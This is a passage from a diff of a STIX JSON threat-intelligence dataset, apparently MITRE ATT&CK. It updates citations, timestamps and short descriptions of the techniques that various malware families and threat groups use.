"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--79499993-a8d6-45eb-b343-bf58dea5bdde",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--64aab090-e7c2-4114-8c15-49700b611fb8",
@@ -76805,12 +77880,12 @@
"url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-2843-99"
}
],
- "source_ref": "malware--79499993-a8d6-45eb-b343-bf58dea5bdde",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--79499993-a8d6-45eb-b343-bf58dea5bdde",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add"
},
{
"id": "relationship--ae38c68d-cc08-4460-9d98-ddf957f837e2",
@@ -76926,16 +78001,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--28b97733-ef07-4414-aaa5-df50b2d30cc5",
"relationship_type": "uses",
"target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
- "modified": "2020-03-17T00:28:01.554Z",
+ "modified": "2020-04-21T23:09:31.032Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -77020,12 +78095,12 @@
"url": "https://github.com/SpiderLabs/Responder"
}
],
- "source_ref": "tool--a1dd2dbd-1550-44bf-abcc-1a4c52e97719",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-01-16T16:13:52.465Z"
+ "created": "2018-01-16T16:13:52.465Z",
+ "source_ref": "tool--a1dd2dbd-1550-44bf-abcc-1a4c52e97719",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529"
},
{
"id": "relationship--3427863f-d4c4-4272-ad60-1479e42ed4af",
@@ -77051,22 +78126,27 @@
{
"id": "relationship--d30d8fa0-7f24-41e5-ae8d-e4449e88d2f0",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) tools contained an application to check performance of USB flash drives.(Citation: Palo Alto Gamaredon Feb 2017)",
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) tools have contained an application to check performance of USB flash drives. [Gamaredon Group](https://attack.mitre.org/groups/G0047) has also used malware to scan for removable drives.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: ESET Gamaredon June 2020)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
- "source_name": "Palo Alto Gamaredon Feb 2017"
+ "source_name": "Palo Alto Gamaredon Feb 2017",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
+ },
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
}
],
"source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
"relationship_type": "uses",
"target_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643",
"type": "relationship",
- "modified": "2019-03-25T12:57:18.646Z",
+ "modified": "2020-06-22T17:54:15.755Z",
"created": "2017-05-31T21:33:27.080Z"
},
{
@@ -77378,22 +78458,22 @@
{
"id": "relationship--d412ff4a-d9d0-44a9-b8b3-36a650f18036",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[RTM](https://attack.mitre.org/software/S0148) can scan victim drives to look for specific banking software on the machine to determine next actions. It also looks at browsing history and open tabs for specific strings.(Citation: ESET RTM Feb 2017)",
+ "description": "[RTM](https://attack.mitre.org/software/S0148) can check for specific files and directories associated with virtualization and malware analysis.(Citation: Unit42 Redaman January 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
"type": "relationship",
- "modified": "2020-03-16T17:46:57.064Z",
+ "modified": "2020-06-18T16:05:23.339Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -77520,12 +78600,12 @@
"url": "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/"
}
],
- "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--5e4a2073-9643-44cb-a0b5-e7f4048446c7",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--5e4a2073-9643-44cb-a0b5-e7f4048446c7"
},
{
"id": "relationship--82b679af-7408-4f41-8fc0-5b0cf5993726",
@@ -77823,7 +78903,7 @@
{
"id": "relationship--74486fa3-a5b8-49b2-82b7-0c453b4baf12",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Tor](https://attack.mitre.org/software/S0183) encapsulates traffic in multiple layers of encryption.(Citation: Dingledine Tor The Second-Generation Onion Router)",
+ "description": "[Tor](https://attack.mitre.org/software/S0183) encapsulates traffic in multiple layers of encryption, using TLS by default.(Citation: Dingledine Tor The Second-Generation Onion Router)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -77836,30 +78916,35 @@
],
"source_ref": "tool--ed7d0cb1-87a6-43b4-9f46-ef1bc56d6c68",
"relationship_type": "uses",
- "target_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118",
+ "target_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada",
"type": "relationship",
- "modified": "2020-03-23T17:00:01.353Z",
+ "modified": "2020-04-29T23:00:47.227Z",
"created": "2018-01-16T16:13:52.465Z"
},
{
"id": "relationship--23e2dc58-4b8d-48d8-82fd-d051892a7d58",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[RTM](https://attack.mitre.org/software/S0148) can record keystrokes from both the keyboard and virtual keyboard.(Citation: ESET RTM Feb 2017)",
+ "description": "[RTM](https://attack.mitre.org/software/S0148) can record keystrokes from both the keyboard and virtual keyboard.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ },
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
"type": "relationship",
- "modified": "2020-03-16T17:46:57.071Z",
+ "modified": "2020-06-16T20:51:13.916Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -78059,17 +79144,17 @@
"url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf"
}
],
- "source_ref": "malware--49abab73-3c5c-476e-afd5-69b5c732d845",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--49abab73-3c5c-476e-afd5-69b5c732d845",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18"
},
{
"id": "relationship--f22106b0-ca8c-45ad-b20c-5a5ddd7bf886",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[ROKRAT](https://attack.mitre.org/software/S0240) use HTTPS for all command and control communication methods.(Citation: Talos ROKRAT)",
+ "description": "[ROKRAT](https://attack.mitre.org/software/S0240) use HTTPS for all command and control communication methods.(Citation: Talos ROKRAT)(Citation: NCCGroup RokRat Nov 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -78078,13 +79163,18 @@
"url": "https://blog.talosintelligence.com/2017/04/introducing-rokrat.html",
"description": "Mercer, W., Rascagneres, P. (2017, April 03). Introducing ROKRAT. Retrieved May 21, 2018.",
"source_name": "Talos ROKRAT"
+ },
+ {
+ "source_name": "NCCGroup RokRat Nov 2018",
+ "url": "https://www.nccgroup.com/uk/about-us/newsroom-and-events/blogs/2018/november/rokrat-analysis/",
+ "description": "Pantazopoulos, N.. (2018, November 8). RokRat Analysis. Retrieved May 21, 2020."
}
],
"source_ref": "malware--60a9c2f0-b7a5-4e8e-959c-e1a3ff314a5f",
"relationship_type": "uses",
"target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
"type": "relationship",
- "modified": "2020-03-17T02:29:32.882Z",
+ "modified": "2020-05-21T17:07:02.738Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -78132,22 +79222,27 @@
{
"id": "relationship--f6d23c00-158e-4e39-bf9b-f18344cd0151",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[RTM](https://attack.mitre.org/software/S0148) can capture screenshots.(Citation: ESET RTM Feb 2017)",
+ "description": "[RTM](https://attack.mitre.org/software/S0148) can capture screenshots.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ },
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
"type": "relationship",
- "modified": "2020-03-16T17:46:57.057Z",
+ "modified": "2020-06-16T20:51:13.935Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -78245,12 +79340,12 @@
"url": "http://sqlmap.org/"
}
],
- "source_ref": "tool--9a2640c2-9f43-46fe-b13f-bde881e55555",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "tool--9a2640c2-9f43-46fe-b13f-bde881e55555",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c"
},
{
"id": "relationship--284ffb1b-ad42-468e-9897-94c25024f0d4",
@@ -78402,16 +79497,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--28b97733-ef07-4414-aaa5-df50b2d30cc5",
"relationship_type": "uses",
"target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579",
"type": "relationship",
- "modified": "2020-03-17T00:28:01.552Z",
+ "modified": "2020-04-21T23:09:31.052Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -78424,7 +79519,7 @@
"external_references": [
{
"source_name": "Palo Alto Gamaredon Feb 2017",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
"url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
}
],
@@ -78432,7 +79527,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
"type": "relationship",
- "modified": "2020-03-17T02:15:40.374Z",
+ "modified": "2020-06-22T17:54:16.024Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -78445,7 +79540,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416",
"type": "relationship",
- "modified": "2020-03-24T14:48:47.992Z",
+ "modified": "2020-06-30T22:50:06.273Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -78694,7 +79789,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967",
"type": "relationship",
- "modified": "2019-07-24T14:33:42.577Z",
+ "modified": "2020-07-14T19:42:10.357Z",
"created": "2017-05-31T21:33:27.030Z"
},
{
@@ -78815,16 +79910,15 @@
],
"external_references": [
{
- "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.",
"source_name": "DustySky",
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"
+ "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
}
],
"source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
"relationship_type": "uses",
"target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
- "modified": "2020-03-23T22:01:46.153Z",
+ "modified": "2020-05-14T15:14:33.569Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -79306,12 +80400,12 @@
"url": "https://www-west.symantec.com/content/symantec/english/en/security-center/writeup.html/2018-040209-1742-99"
}
],
- "source_ref": "malware--8d9e758b-735f-4cbc-ba7c-32cd15138b2a",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--8d9e758b-735f-4cbc-ba7c-32cd15138b2a",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32"
},
{
"id": "relationship--d8a5e73d-fe56-42d7-a53d-09a90c21308b",
@@ -79552,17 +80646,17 @@
"url": "https://ashwinrayaprolu.wordpress.com/2011/04/12/xcmd-an-alternative-to-psexec/"
}
],
- "source_ref": "tool--4fa49fc0-9162-4bdb-a37e-7aa3dcb6d38b",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--4fa49fc0-9162-4bdb-a37e-7aa3dcb6d38b",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4"
},
{
"id": "relationship--6b11697f-be6c-4cd7-b445-4d277a8d7346",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "The [Winnti](https://attack.mitre.org/software/S0141) installer loads a DLL using rundll32.(Citation: Microsoft Winnti Jan 2017)",
+ "description": "The [Winnti for Windows](https://attack.mitre.org/software/S0141) installer loads a DLL using rundll32.(Citation: Microsoft Winnti Jan 2017)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -79657,7 +80751,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e",
"type": "relationship",
- "modified": "2020-03-24T17:26:16.387Z",
+ "modified": "2020-06-24T18:58:35.357Z",
"created": "2017-05-31T21:33:27.025Z"
},
{
@@ -79773,22 +80867,22 @@
{
"id": "relationship--a5d7526f-2b1f-4a69-abc7-926b22bc402b",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Hi-Zor](https://attack.mitre.org/software/S0087) encrypts C2 traffic with HTTPS and also encodes it with a single-byte XOR key.(Citation: Fidelis INOCNATION)",
+ "description": "[Hi-Zor](https://attack.mitre.org/software/S0087) encrypts C2 traffic with TLS.(Citation: Fidelis Hi-Zor)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "Fidelis INOCNATION",
- "description": "Fidelis Cybersecurity. (2015, December 16). Fidelis Threat Advisory #1020: Dissecting the Malware Involved in the INOCNATION Campaign. Retrieved March 24, 2016.",
- "url": "https://www.fidelissecurity.com/sites/default/files/FTA_1020_Fidelis_Inocnation_FINAL_0.pdf"
+ "source_name": "Fidelis Hi-Zor",
+ "description": "Fidelis Threat Research Team. (2016, January 27). Introducing Hi-Zor RAT. Retrieved March 24, 2016.",
+ "url": "https://www.fidelissecurity.com/threatgeek/archive/introducing-hi-zor-rat/"
}
],
"source_ref": "malware--5967cc93-57c9-404a-8ffd-097edfa7bdfc",
"relationship_type": "uses",
- "target_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118",
+ "target_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada",
"type": "relationship",
- "modified": "2020-03-23T16:58:56.488Z",
+ "modified": "2020-04-29T22:19:36.097Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -79873,12 +80967,12 @@
"url": "https://technet.microsoft.com/en-us/library/bb491010.aspx"
}
],
- "source_ref": "tool--2e45723a-31da-4a7e-aaa6-e01998a6788f",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--2e45723a-31da-4a7e-aaa6-e01998a6788f",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa"
},
{
"id": "relationship--fdf9f632-03ce-4e8c-88bf-3798bb7f5ef4",
@@ -79958,7 +81052,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e",
"type": "relationship",
- "modified": "2020-02-05T14:28:08.504Z",
+ "modified": "2020-06-20T22:09:22.696Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -80436,28 +81530,38 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433",
"type": "relationship",
- "modified": "2019-07-24T19:28:36.032Z",
+ "modified": "2020-07-14T19:49:47.587Z",
"created": "2017-05-31T21:33:27.018Z"
},
{
"id": "relationship--253b56a5-232f-44bc-af4d-85ccc12a0577",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "Tools used by [Gamaredon Group](https://attack.mitre.org/groups/G0047) are capable of downloading and executing additional payloads.(Citation: Palo Alto Gamaredon Feb 2017)",
+ "description": "Tools used by [Gamaredon Group](https://attack.mitre.org/groups/G0047) are capable of downloading and executing additional payloads.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
- "source_name": "Palo Alto Gamaredon Feb 2017"
+ "source_name": "Palo Alto Gamaredon Feb 2017",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
+ },
+ {
+ "source_name": "TrendMicro Gamaredon April 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/",
+ "description": "Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020."
+ },
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
}
],
"source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
"relationship_type": "uses",
"target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"type": "relationship",
- "modified": "2019-03-25T12:57:18.647Z",
+ "modified": "2020-06-22T17:55:32.146Z",
"created": "2017-05-31T21:33:27.080Z"
},
{
@@ -80741,7 +81845,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--c3888c54-775d-4b2f-b759-75a2ececcbfd",
"type": "relationship",
- "modified": "2019-07-24T19:05:56.602Z",
+ "modified": "2020-07-14T19:47:47.045Z",
"created": "2017-05-31T21:33:27.020Z"
},
{
@@ -81035,7 +82139,7 @@
{
"id": "relationship--10c33088-630e-456d-ad0f-8a63be4d3946",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Sykipot](https://attack.mitre.org/software/S0018) communicates using HTTPS and uses a custom encryption cipher to encrypt the HTTPS message body.(Citation: Blasco 2013)",
+ "description": "[Sykipot](https://attack.mitre.org/software/S0018) uses SSL for encrypting C2 communications.(Citation: Blasco 2013)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -81048,9 +82152,9 @@
],
"source_ref": "malware--6a0ef5d4-fc7c-4dda-85d7-592e4dbdc5d9",
"relationship_type": "uses",
- "target_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118",
+ "target_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada",
"type": "relationship",
- "modified": "2020-03-23T16:59:43.446Z",
+ "modified": "2020-04-29T22:15:31.440Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -81268,7 +82372,7 @@
{
"id": "relationship--921b3245-0795-40cd-82e1-04f38bc42b14",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[ROKRAT](https://attack.mitre.org/software/S0240) retrieves additional malicious payloads from the C2 server.(Citation: Talos ROKRAT)",
+ "description": "[ROKRAT](https://attack.mitre.org/software/S0240) retrieves additional malicious payloads from the C2 server.(Citation: Talos ROKRAT)(Citation: NCCGroup RokRat Nov 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -81277,19 +82381,24 @@
"url": "https://blog.talosintelligence.com/2017/04/introducing-rokrat.html",
"description": "Mercer, W., Rascagneres, P. (2017, April 03). Introducing ROKRAT. Retrieved May 21, 2018.",
"source_name": "Talos ROKRAT"
+ },
+ {
+ "source_name": "NCCGroup RokRat Nov 2018",
+ "url": "https://www.nccgroup.com/uk/about-us/newsroom-and-events/blogs/2018/november/rokrat-analysis/",
+ "description": "Pantazopoulos, N.. (2018, November 8). RokRat Analysis. Retrieved May 21, 2020."
}
],
"source_ref": "malware--60a9c2f0-b7a5-4e8e-959c-e1a3ff314a5f",
"relationship_type": "uses",
"target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"type": "relationship",
- "modified": "2019-07-26T22:56:58.437Z",
+ "modified": "2020-05-21T17:07:02.740Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
"id": "relationship--854a3a7e-09a7-4523-ac7f-d625a0b50b6b",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Cobalt Strike](https://attack.mitre.org/software/S0154)'s \"beacon\" payload is capable of capturing screen shots.(Citation: cobaltstrike manual)",
+ "description": "[Cobalt Strike](https://attack.mitre.org/software/S0154)'s \"beacon\" payload is capable of capturing screenshots.(Citation: cobaltstrike manual)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -81304,7 +82413,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
"type": "relationship",
- "modified": "2019-06-06T19:04:39.416Z",
+ "modified": "2020-06-03T20:20:56.526Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -81451,27 +82560,6 @@
"modified": "2019-07-14T21:15:55.270Z",
"created": "2017-05-31T21:33:27.062Z"
},
- {
- "id": "relationship--e931afd2-35b2-4f9f-9b7c-88093e822c7b",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Magic Hound](https://attack.mitre.org/groups/G0059) used various social media channels to spearphish victims.(Citation: SecureWorks Mia Ash July 2017)",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "external_references": [
- {
- "source_name": "SecureWorks Mia Ash July 2017",
- "description": "Counter Threat Unit Research Team. (2017, July 27). The Curious Case of Mia Ash: Fake Persona Lures Middle Eastern Targets. Retrieved February 26, 2018.",
- "url": "https://www.secureworks.com/research/the-curious-case-of-mia-ash"
- }
- ],
- "source_ref": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f6ad61ee-65f3-4bd0-a3f5-2f0accb36317",
- "type": "relationship",
- "modified": "2019-09-09T19:21:42.361Z",
